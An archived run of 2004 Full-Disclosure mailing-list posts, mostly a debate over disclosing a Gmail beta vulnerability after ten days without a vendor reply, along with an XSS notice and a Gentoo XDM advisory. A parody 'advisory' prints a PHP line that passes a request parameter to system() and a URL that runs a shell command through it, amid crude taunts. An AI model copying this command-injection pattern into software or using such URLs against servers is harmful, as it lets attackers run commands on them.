> subscription to the list.
>
>
>
> --
> Tremaine
> IT Security Consultant
>

I agree with "System Outage". Gmail clearly told us that their website is
in BETA stage.

For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
this software MAY HAVE security holes. That's why they want us to test
this site before going to the public release, and it's our job to notify
to the gmail team all bugs AND security holes we may find. As long as
this website is in beta stage, all advisory that someone may send in this
list or elsewhere are NOT considered 'Security Advisory' for me.

The original author may not receive answers from the Gmail Team, but this
site is NOT IN PRODUCTION. When gmail site will be official and when this
bug is still there, NOW you can publish your security advisory.

Futhermore, the best people for testing the software (bugs and security
holes) is the public. They can do many things which we will never
thought or imagined.

BTW, I'm sure that the Gmail developers expect that the public will find
some security holes...

If we must publish all security advisorys about beta software, this list
will be flooded...

E.
--
Eric LeBlanc
inoukigt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: System Outage (system_outageyahoo.com)
Date: Mon Jul 05 2004 - 12:57:31 CDT

 
It's against my morals to give tips on how to hack,exploit,compromise Gmail on a public mailing list, which could assist malicious users to further destroy the service.
 
However, I welcome users to compromise my Gmail account. My address is system.outagegmail.com
 
I suspect I won't have that account for very much longer. Happy hacking.
 
 
Cheerio
 

amforwardmailsurf.com wrote:
System Outage wrote:
|...why do many decide to post the exploit along with the advisory.

I'd like to draw your attention to the fact that the accompanying code to the
advisories you talk about is usually not referred to as "exploits." These are
actually called "proof of concepts."

It's true some people misuse them, but these "exploits" do help greatly in
understanding the problem, finding more similar/related problems, and even
patching it/them.

|...a serious hole exposed to the public, before the vendor (Gmail) has had a
|chance to scramble |together an incident response and get the hole patched
|out, before a serious number of account's |become compromised on the service.

I agree with you. "Serious" holes should be reported to the vendor some time
before it's disclosed to public. Patience is a must in this case (not infinite
though). However, I don't think this applies to the thread we are talking
about. This is a vulnerability with very low severity. This is also a beta
service and you should use it at your own risk.

Aside from that,
I am, however, still concerned whether this vulnerability can be escalated to
higher severity. Could the same problem exist with other scripts? Can I edit my
profile, for example, and find someone else's profile, and perhaps his secret
answer?

Your thoughts are highly appreciated.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

                
---------------------------------
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Tremaine (tremainegmail.com)
Date: Mon Jul 05 2004 - 13:22:54 CDT

On Mon, 5 Jul 2004 13:42:14 -0400 (EDT), Eric LeBlanc <inoukigt.net> wrote:
> On Mon, 5 Jul 2004, System Outage wrote:

> > Tremaine <tremainegmail.com> wrote:
> > It's about posting security advisories. The initial poster advises
> > they notified the gmail team, and posted this advisory 10 days later.
> >
> > It is immaterial whether an application is in alpha, beta or
> > production. If the software or application is in use outside the
> > development team, and there is a security issue, it is relevant to
> > this list.
> >
> >
> > It's called Full Disclosure for a reason... not partial disclosure,
> > not disclosure of production applications only... Full Disclosure.
> >
> > If you want partial disclosure, you may need to rethink your
> > subscription to the list.
> >
> >
> >
> > --
> > Tremaine
> > IT Security Consultant
> >
>
> I agree with "System Outage". Gmail clearly told us that their website is
> in BETA stage.
>
> For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
> this software MAY HAVE security holes. That's why they want us to test
> this site before going to the public release, and it's our job to notify
> to the gmail team all bugs AND security holes we may find. As long as
> this website is in beta stage, all advisory that someone may send in this
> list or elsewhere are NOT considered 'Security Advisory' for me.
>
> The original author may not receive answers from the Gmail Team, but this
> site is NOT IN PRODUCTION. When gmail site will be official and when this
> bug is still there, NOW you can publish your security advisory.
>
> Futhermore, the best people for testing the software (bugs and security
> holes) is the public. They can do many things which we will never
> thought or imagined.
>
> BTW, I'm sure that the Gmail developers expect that the public will find
> some security holes...
>
> If we must publish all security advisorys about beta software, this list
> will be flooded...
>
> E.
> --
> Eric LeBlanc
> inoukigt.net
> --------------------------------------------------
> UNIX is user friendly.
> It's just selective about who its friends are.
> ==================================================

I think this may be one of those instances where we'll have to agree
to disagree. Certainly I would take a dim view if the original poster
hadn't notified gmail in advance of their advisory to FD. I do not
however believe that beta software that is in wide spread use should
be excluded from public scrutiny and notification. Gmail was not
released simply to a select few, it has been opened up via gmail
invites to widespread usage, and is being profited from via targetted
commercial advertising.

The advisory also may point towards other coding issues in Google
itself, which can then be investigated based on the information.

Anyhow, as I noted above I think we may just have different uses and
expectations of FD, and I for one don't have an issue like this one
brought out.

Cheers,

--
Tremaine
IT Security Consultant

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] RS-2004-2: "Content-Type" XSS vulnerability affecting other webmail systems

From: Roman Medina-Heigl Hernandez (romanrs-labs.com)
Date: Mon Jul 05 2004 - 13:28:16 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

  Hello,

  On 29.May.2004, I disclosed an important XSS vulnerability in latest
versions of a well-known webmail: SquirrelMail. Upon publication I
received the notice that other important webmails were also vulnerable
to the same bug. Indeed the same exploits released for SquirrelMail
worked without any changes in these systems. I decided to contact
several other webmail vendors and ask directly to check their software
and confirm or deny the vulnerability.

  The purpose of this brief advisory is to provide you with the
collected info in an objective and summarized way.

  PS: Sorry for the big delay.

 Saludos,
 --Roman

- --
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>

iQA/AwUBQOmPneR/in3q1WdCEQKHUQCfaNoy7mu+g0AKsK9LFiwVyT5zXJEAoIzW
h0imdE0FayaQLIFBiX47hpHW
=9k38
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Maarten (fulldiscultratux.org)
Date: Mon Jul 05 2004 - 13:55:12 CDT

On Monday 05 July 2004 18:00, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit
> along with the advisory. To me this is not a responsible thing to do.
> Whoever knows how many script kiddies are sleeping on this list and taking
> advantage of the free exploit giveaway's seen here.

Can we please not have this discussion again ? Even IF you have a valid
point, this list was conceived to include PoC code, despite the possible evil
consequences. Read the list archives for lots more discussion on this.

> 10 days isn't an awful long time and the vendor never made primary contact
> with the user in question. Meaning, for whatever reason the e-mail may not
> have been delivered and because of this the Gmail Team could easily of been
> caught short on this issue and a serious hole exposed to the public, before
> the vendor (Gmail) has had a chance to scramble together an incident
> response and get the hole patched out, before a serious number of account's
> become compromised on the service.

Ten days is more than enough for them to answer "Yes we received your mail /
Yes we're looking into it, it will take some time before we have an update."
Maybe not for microsoft, but what can you do when you receive no reply at all?

And if the email actually did not reach them, all the more reason to post to
this list. How else do you suggest that people become aware of an issue?
Besides, the hole isn't that serious, so where's the fire anyway ?

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] ANOTHER 3L33T3 ADVISO AND NOT ON PHP-CASTOR 10.3 BETA (used by 3 peoples on internet) !!! 0DAY EXPLOIT !

frogmanno-log.org
Date: Mon Jul 05 2004 - 14:20:24 CDT

This is IHCTEAM material. We fuck blackhats and we own the planet. This is
a leet advisory, s0 l33t. Just read it and be quiet.

---------------------------

IHC TEAM private work, all the fame become to IHC TEAM and the leetest mr.
Frog-mn !!!!

Product: PHP
Version: all
Security level: Very high baby !!!

What's the problem ?
==================

There is a BIG 1337 BUG 0day in all the php versions for ever never. This
bug is caused by
the system() function. This is a very VERY 3v1l backdoor, that allows
execution of
arbitrary shell command. This backdoor has been coded by ZyXyS from HACK3R
c0rp0r4ti0n (c) (TM) (R).

Because we want fame, we'll explain you da bug:
l00k at th1s 3v1l code:

<?
system("$cmd");
?>

*TADAAAA* !

If this code is on a webserver, a malicious user (like ZyXyS) can exec
EVERYTHING and own EVERYWHERE.
Example:
www.thc-is-lame.org/page.php?cmd=ls%20/tmp

It will give you:

tmp-shells-owned-with-THC-Hydra-fucking-lame-kiddy-tool.txt
adore.tar.gz
last-10-leaked-exploits.tar.gz

You see, you can rock.
So, at this point we can see that ZyXyS is a very leet guy: THIS BACKDOOR
is less detectable than
a LKM BACKDOOR like adore.tar.gz (<--- hahaha).

I release this vulnerability because the K-otik team (www.k-otik.com)
owned ZyXyS 10 days ago
(after the fbi) and discovered the backdoor, and k-otik wanted to write an
advisory, ONLY FOR FAME
AND MONEY. I want this fame (but for the money, I don't mind, I am rich
because I sell 0day,
traded on #darknet, to idefense), so I had to release the bug before K-otik.
k-otik is like hack.co.za, they release everything and nothing, but they
can't code their own exploit.

Greets:
======

Rudolf Polzer (divzerogmail.com): Thank to his idea to disclose this bug
and if you have another idea
for us mail me
packetstormsecurity: they give us kiddie-friendly exploits and mass rooters
spender: he sells good security patches
isec: now my grandmother can r00t linux boxes
bugtraq: they leak bugs found by ugly blackhats, which worked a lot of
time to discover them
espionet guys: they represented very well the hacker scene in a TV show
with their netbus
(please don't open my cdrom device guys)

Fame:
====

We already owned everyone and everything with these exploits years ago,
and in
fact we've all had them sitting on the shelf gathering dust due to lack of
new targets.

FUN TESTED IDEAS:

www.team-teso.net (down because of us)
www.thc.org (haha owned 10 times)
www.securityfocus.com

It was very funny to read .gov and .mil files.

WARNING !!!

/!\ WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH /!\

Visit us:

www.ihcteam.com
www.newffr.com
www.espionet.net
www.underground-fr.org
www.phpsecure.com

---------------------------

We n33d f4me, m0n3y, g1rls and m0nk3ys, so VIVA EL DISCLOSURO.

---- fr0g-mn ----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Maarten (fulldiscultratux.org)
Date: Mon Jul 05 2004 - 14:09:53 CDT

On Monday 05 July 2004 19:42, Eric LeBlanc wrote:
> On Mon, 5 Jul 2004, System Outage wrote:

> I agree with "System Outage". Gmail clearly told us that their website is
> in BETA stage.

Beta, alpha, released, yada yada. Gmail is OPEN for the public, albeit you
need "an invitation". Thus, enough reason to disclose security holes.

> For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
> this software MAY HAVE security holes. That's why they want us to test
> this site before going to the public release, and it's our job to notify
> to the gmail team all bugs AND security holes we may find. As long as
> this website is in beta stage, all advisory that someone may send in this
> list or elsewhere are NOT considered 'Security Advisory' for me.

Hm. By that standard, we could not ever disclose stuff about microsoft
software. Cause their stuff is indefinitely beta, hahaha. ;-)

> The original author may not receive answers from the Gmail Team, but this
> site is NOT IN PRODUCTION. When gmail site will be official and when this
> bug is still there, NOW you can publish your security advisory.

So, the solution to having embarrassing security problems published is never
declare the program "Released". Can someone please tell microsoft? They'd be
real interested to declare IE and Outlook beta-software forever in that case.

> Futhermore, the best people for testing the software (bugs and security
> holes) is the public. They can do many things which we will never
> thought or imagined.

Well now, isn't this e x a c t l y what's happening here ?

> BTW, I'm sure that the Gmail developers expect that the public will find
> some security holes...
>
> If we must publish all security advisorys about beta software, this list
> will be flooded...

The very reason to HAVE a beta test phase is to find and flush out bugs early.
Doing that, the released program can be as flawless as can be. So when would
you suggest disclosing bugs is a good time ? Release date being too late...

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: System Outage (system_outageyahoo.com)
Date: Mon Jul 05 2004 - 14:07:33 CDT

I fully agree with you on this topic. I found it hard to believe users were posting advisories for Gmail before public release. In my view all issues should be directed to Gmail and if the user wishes to use lists, such as FD. The user should wait until the service is available to the public and then, perhaps, send it to FD for discussion.
 
The user could also state the discovery date and various other timeline dates, to give the user some better acknowledgement in the advisory. This will prove (If the user wishes it to be known) they did find the hole at the Beta stage and that Gmail let it slip through the net.
 
I suspect -alot- of vulnerabilities will come to light of the week that Gmail makes the service public. I think alot of users are holding back until then, I maybe wrong though.
 
 
Cheerio
 

Eric LeBlanc <inoukigt.net> wrote:
I agree with "System Outage". Gmail clearly told us that their website is
in BETA stage.

For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
this software MAY HAVE security holes. That's why they want us to test
this site before going to the public release, and it's our job to notify
to the gmail team all bugs AND security holes we may find. As long as
this website is in beta stage, all advisory that someone may send in this
list or elsewhere are NOT considered 'Security Advisory' for me.

The original author may not receive answers from the Gmail Team, but this
site is NOT IN PRODUCTION. When gmail site will be official and when this
bug is still there, NOW you can publish your security advisory.

Futhermore, the best people for testing the software (bugs and security
holes) is the public. They can do many things which we will never
thought or imagined.

BTW, I'm sure that the Gmail developers expect that the public will find
some security holes...

If we must publish all security advisorys about beta software, this list
will be flooded...

E.
--
Eric LeBlanc
inoukigt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

                
---------------------------------
Do you Yahoo!?
Take Yahoo! Mail with you! Get it on your mobile phone.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Geoff Shively (gshivelypivx.com)
Date: Mon Jul 05 2004 - 14:04:35 CDT

Full disclosure... True. Nobody is taking issue with the content, just the timing.

10 days is an unreal expectation. Though 10 days may feel like a long time to you sir, it whizez by inside of a growth company such as Google.

This type of disclosure is where the motivation for OIS comes from. I am not saying I agree with the OIS 'partner' agendas or their execution- though there is some genuine interest in setting basic guidelines based on industry experiance, not regulating research or its biproducts (imho not gunna happen). So where is the middle ground as it applies to research.

Cheers,
Geoff Shively
Chief Scientist, Founder
PivX Solutions, Inc.

23 Corporate Plaza #280
Newport Beach, CA 92660

http://www.pivx.com
gshivelypivx.com
Ticker: PIVX.OB

Mobile: 949.903.8856

-----Original Message-----
From: Tremaine <tremainegmail.com>
To: System Outage <system_outageyahoo.com>
CC: full-disclosurelists.netsys.com <full-disclosurelists.netsys.com>
Sent: Mon Jul 05 07:46:16 2004
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

It's about posting security advisories. The initial poster advises
they notified the gmail team, and posted this advisory 10 days later.

It is immaterial whether an application is in alpha, beta or
production. If the software or application is in use outside the
development team, and there is a security issue, it is relevant to
this list.

It's called Full Disclosure for a reason... not partial disclosure,
not disclosure of production applications only... Full Disclosure.

If you want partial disclosure, you may need to rethink your
subscription to the list.

--
Tremaine
IT Security Consultant

----- Original Message -----
From: System Outage <system_outageyahoo.com>
Date: Mon, 5 Jul 2004 06:46:42 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability
To: full-disclosurelists.netsys.com

If it's not about respect then what is it about?
 
You have no respect for the Gmail Team, that's for sure.
 
I guess this list isn't about respect...
 
It's about kiddies posting advisories and exploits for fun and little
care for the vendor(s).
 
 
Cheerio

 

amforwardmailsurf.com wrote:
System Outage wrote:

|The correct channel to post such "bugs" is the Gmail contact link for "bug
|reports".

I have already contacted Gmail about 10 days ago, but I have not received any
replies till this moment.

|If you had waited until the Gmail dev team declared gmail a public release,
|you would have gained more respect in the security community scene.

I don't think this is about respect afterall.

Regards,
Ahmed Motaz

------------------------------------------------------
Mailsurf.com your communication portal for SMS,
Email, Fax, E-Cards and more. www.mailsurf.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

________________________________
Do you Yahoo!?
Yahoo! Mail - Helps protect you from nasty viruses.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail/Yahoo!

From: System Outage (system_outageyahoo.com)
Date: Mon Jul 05 2004 - 14:54:05 CDT

Yeah, i've contacted the Yahoo! Security Team over the past 1/2 years with various issues that they -did- follow up and patch, but did not once think to tell me about progress. It was only after I spoke to a representative of Yahoo! Security and said I was going to post all the underground security issues with Yahoo! to FD, that I received an e-mail to say sorry that we didn't contact you. We've been reading -all- mails are we've been taking further action(s), after all this time.
 
I thought Yahoo! Security had been ignoring me, but the issues were being patched and that's all that matters at the end of the day. Although I did think it was bad mannered of Yahoo! representatives to treat users who provide them with valuable information, to be felt like 2nd class.
 
I guess the same may apply for Google Security Team. After all, Yahoo! and Google were very good partners, up until recently. Google and Yahoo! seem to have very quickly become rivals, with regards of Search and E-mail.
 
The things I could tell FD about Yahoo! would rock the Yahoo! Security Team to it's foundations (and they know it). Luckily for them, I have morals.
 
Yahoo! are aware of who I am, even though they know me on another alias.
 
 
Cheerio

Maarten <fulldiscultratux.org> wrote:
On Monday 05 July 2004 18:00, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit
> along with the advisory. To me this is not a responsible thing to do.
> Whoever knows how many script kiddies are sleeping on this list and taking
> advantage of the free exploit giveaway's seen here.

Can we please not have this discussion again ? Even IF you have a valid
point, this list was conceived to include PoC code, despite the possible evil
consequences. Read the list archives for lots more discussion on this.

> 10 days isn't an awful long time and the vendor never made primary contact
> with the user in question. Meaning, for whatever reason the e-mail may not
> have been delivered and because of this the Gmail Team could easily of been
> caught short on this issue and a serious hole exposed to the public, before
> the vendor (Gmail) has had a chance to scramble together an incident
> response and get the hole patched out, before a serious number of account's
> become compromised on the service.

Ten days is more than enough for them to answer "Yes we received your mail /
Yes we're looking into it, it will take some time before we have an update."
Maybe not for microsoft, but what can you do when you receive no reply at all?

And if the email actually did not reach them, all the more reason to post to
this list. How else do you suggest that people become aware of an issue?
Besides, the hole isn't that serious, so where's the fire anyway ?

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

                
---------------------------------
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Eric LeBlanc (inoukigt.net)
Date: Mon Jul 05 2004 - 15:38:03 CDT

On Mon, 5 Jul 2004, Maarten wrote:

> Hm. By that standard, we could not ever disclose stuff about microsoft
> software. Cause their stuff is indefinitely beta, hahaha. ;-)
[ Other repeated stuff sniped ]

In your eyes maybe, but not in the eyes of Microsoft and serious
customers. Did you see the word 'BETA' in IE6 (or other software) when
you download from Microsoft (no in developper section, but in public
release) ? AFAIK, I never seen that (in PUBLIC RELEASE I repeat).

Anyway, any serious company will never put beta software in a production
environment.

This is my last word in this list, because it's useless... Everyone has
its own opinion about this !

E.
--
Eric LeBlanc
inoukigt.net
--------------------------------------------------
UNIX is user friendly.
It's just selective about who its friends are.
==================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail/Yahoo!

From: System Outage (system_outageyahoo.com)
Date: Mon Jul 05 2004 - 16:01:52 CDT

My e-penis fux Yahoo! Security Team.
 
 
Cheerio

Geoffrey Huntley <ghuntleygmail.com> wrote:
my e-penis is > your e-penis

Give it a break dude.

----- Original Message -----
From: System Outage
Date: Mon, 5 Jul 2004 12:54:05 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail/Yahoo!
To: full-disclosurelists.netsys.com

Yeah, i've contacted the Yahoo! Security Team over the past 1/2 years
with various issues that they -did- follow up and patch, but did not
once think to tell me about progress. It was only after I spoke to a
representative of Yahoo! Security and said I was going to post all the
underground security issues with Yahoo! to FD, that I received an
e-mail to say sorry that we didn't contact you. We've been reading
-all- mails are we've been taking further action(s), after all this
time.

I thought Yahoo! Security had been ignoring me, but the issues were
being patched and that's all that matters at the end of the day.
Although I did think it was bad mannered of Yahoo! representatives to
treat users who provide them with valuable information, to be felt
like 2nd class.

I guess the same may apply for Google Security Team. After all, Yahoo!
and Google were very good partners, up until recently. Google and
Yahoo! seem to have very quickly become rivals, with regards of Search
and E-mail.

The things I could tell FD about Yahoo! would rock the Yahoo! Security
Team to it's foundations (and they know it). Luckily for them, I have
morals.

Yahoo! are aware of who I am, even though they know me on another alias.

Cheerio

Maarten wrote:

On Monday 05 July 2004 18:00, System Outage wrote:
> If it's about posting advisories, why do many decide to post the exploit
> along with the advisory. To me this is not a responsible thing to do.
> Whoever knows how many script kiddies are sleeping on this list and taking
> advantage of the free exploit giveaway's seen here.

Can we please not have this discussion again ? Even IF you have a valid
point, this list was conceived to include PoC code, despite the possible evil
consequences. Read the list archives for lots more discussion on this.

> 10 days isn't an awful long time and the vendor never made primary contact
> with the user in question. Meaning, for whatever reason the e-mail may not
> have been delivered and because of this the Gmail Team could easily of been
> caught short on this issue and a seri!
ous hole
exposed to the public, before
> the vendor (Gmail) has had a chance to scramble together an incident
> response and get the hole patched out, before a serious number of account's
> become compromised on the service.

Ten days is more than enough for them to answer "Yes we received your mail /
Yes we're looking into it, it will take some time before we have an update."
Maybe not for microsoft, but what can you do when you receive no reply at all?

And if the email actually did not reach them, all the more reason to post to
this list. How else do you suggest that people become aware of an issue?
Besides, the hole isn't that serious, so where's the fire anyway ?

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

________________________________
Do you Yahoo!?

New and Improved Yahoo! Mail - Send 10MB messages!

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail Information Disclosure Vulnerability

From: Remko Lodder (remkoelvandar.org)
Date: Mon Jul 05 2004 - 15:53:54 CDT

Hi maarten, and the rest,
Maarten wrote:

> On Monday 05 July 2004 19:42, Eric LeBlanc wrote:
>
>>On Mon, 5 Jul 2004, System Outage wrote:
>
>
>>I agree with "System Outage". Gmail clearly told us that their website is
>>in BETA stage.
>
>
> Beta, alpha, released, yada yada. Gmail is OPEN for the public, albeit you
> need "an invitation". Thus, enough reason to disclose security holes.

It's being used by others then gmail personel, so privacy and
information that could be YOURS is at stake here. You just opened up a
e-creditcard and got the numbers and information stolen, woeps, sorry,
since it was vulnerable, now i have the codes as well. I need a car, i
will use your creditcard. Thank you very much mister X, saved me a lot
of money (ofcourse there can be other things in your mailbox as well...)

>
>
>>For me, when a software is in 'BETA' (or 'ALPHA'), we SHOULD expect that
>>this software MAY HAVE security holes. That's why they want us to test
>>this site before going to the public release, and it's our job to notify
>>to the gmail team all bugs AND security holes we may find. As long as
>>this website is in beta stage, all advisory that someone may send in this
>>list or elsewhere are NOT considered 'Security Advisory' for me.

I do consider them as Security-Advisory. It's being used in the wild,
more and more people are using it, and more and more information is at
risk. Disclosing a bug first to gmail and then to FD is a normal way of
responding to bugs. That way we ALL profit from it.

>>The original author may not receive answers from the Gmail Team, but this
>>site is NOT IN PRODUCTION. When gmail site will be official and when this
>>bug is still there, NOW you can publish your security advisory.

What exactly do you want to tell us? Wait until hunderd(s) people more
are vulnerable for privacy disclosure? Some how i get the feeling you
came from mars with happy campers that don't care about privacy and
disclosing information that could risk your privacy.

>>Futhermore, the best people for testing the software (bugs and security
>>holes) is the public. They can do many things which we will never
>>thought or imagined.

Indeed, that is why gmail is letting people in , and the group is
getting bigger, finding bugs, reporting them to gmail and then disclose
them is a normal way to follow.

>>BTW, I'm sure that the Gmail developers expect that the public will find
>>some security holes...
>>
>>If we must publish all security advisorys about beta software, this list
>>will be flooded...

Beta software is not always used by thousands of people which get larger
every day...Still i like the disclosure so i know that there are bugs
taken out of the system before production. I would get an itch if i
never heared of bugs of the application before. That means that with
current state of coding and defense mechanism's there are a LOTS of bugs
still present in the system. Now i would not use that ever in my life..

>
>
> The very reason to HAVE a beta test phase is to find and flush out bugs early.
> Doing that, the released program can be as flawless as can be. So when would
> you suggest disclosing bugs is a good time ? Release date being too late...

Exactly, disclose to gmail now, and then inform the public. Again and i
repeat that again, it's a normal way of handling.

>
> Maarten
>

Cheers

--
Kind regards,

Remko Lodder |remkoelvandar.org
Reporter DSINet |remkodsinet.org
Projectleader Mostly-Harmless |remkomostly-harmless.nl

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200407-05 ] XFree86, X.org: XDM ignores requestPort setting

From: Thierry Carrez (koongentoo.org)
Date: Mon Jul 05 2004 - 15:39:58 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: XFree86, X.org: XDM ignores requestPort setting
      Date: July 05, 2004
      Bugs: #53226
        ID: 200407-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

XDM will open TCP sockets for its chooser, even if the
DisplayManager.requestPort setting is set to 0. This may allow
authorized users to access a machine remotely via X, even if the
administrator has configured XDM to refuse such connections.

Background
==========

The X Display Manager (XDM) is a program which provides a graphical
login prompt to users on the console or on remote X terminals. It has
largely been superseded by programs such as GDM and KDM.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 x11-base/xfree <= 4.3.0-r5 >= 4.3.0-r6
  2 x11-base/xorg-x11 <= 6.7.0 >= 6.7.0-r1
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

XDM will open TCP sockets for its chooser, even if the
DisplayManager.requestPort setting is set to 0. Remote clients can use
this port to connect to XDM and request a login window, thus allowing
access to the system.

Impact
======

Authorized users may be able to login remotely to a machine running
XDM, even if this option is disabled in XDM's configuration. Please
note that an attacker must have a preexisting account on the machine in
order to exploit this vulnerability.

Workaround
==========

There is no known workaround at this time. All users should upgrade to
the latest available version of X.

Resolution
==========

If you are using XFree86, you should run the following:

    # emerge sync

    # emerge -pv ">=x11-base/xfree-4.3.0-r6"
    # emerge ">=x11-base/xfree-4.3.0-r6"

If you are using X.org's X11 server, you should run the following:

    # emerge sync

    # emerge -pv ">=x11-base/xorg-x11-6.7.0-r1"
    # emerge ">=x11-base/xorg-x11-6.7.0-r1"

References
==========

  [ 1 ] CAN 2004-0419
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0419
  [ 2 ] XFree86 Bug
        http://bugs.xfree86.org/show_bug.cgi?id=1376

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-200407-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA6bydvcL1obalX08RAgEvAKCswccXfWOuIZ6wdOmB28H+ZYRMAgCfRR6A
9agYr6aSy992+8gT/TchK4o=
=3hE4
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Gmail/Yahoo!

From: System Outage (system_outageyahoo.com)
Date: Mon Jul 05 2004 - 15:57:59 CDT

My e-penis fux Yahoo! Security Team.
 
 
Cheerio

Geoffrey Huntley <ghuntleygmail.com> wrote:
my e-penis is > your e-penis

Give it a break dude.

----- Original Message -----
From: System Outage
Date: Mon, 5 Jul 2004 12:54:05 -0700 (PDT)
Subject: Re: [Full-Disclosure] Gmail/Yahoo!
To: full-disclosurelists.netsys.com

Yeah, i've contacted the Yahoo! Security Team over the past 1/2 years
with various issues that they -did- follow up and patch, but did not
once think to tell me about progress. It was only after I spoke to a
representative of Yahoo! Security and said I was going to post all the
underground security issues with Yahoo! to FD, that I received an
e-mail to say sorry that we didn't contact you. We've been reading
-all- mails are we've been taking further action(s), after all this
time.

I thought Yahoo! Security had been ignoring me, but the issues were
being patched and that's all that matters at the end of the day.
Although I did think it was bad mannered of Yahoo! representatives to
treat users who provide them with valuable information, to be felt
like 2nd class.

I guess the same may apply for Google Security Team. After all, Yahoo!
and Google were very good partners, up until recently. Google and
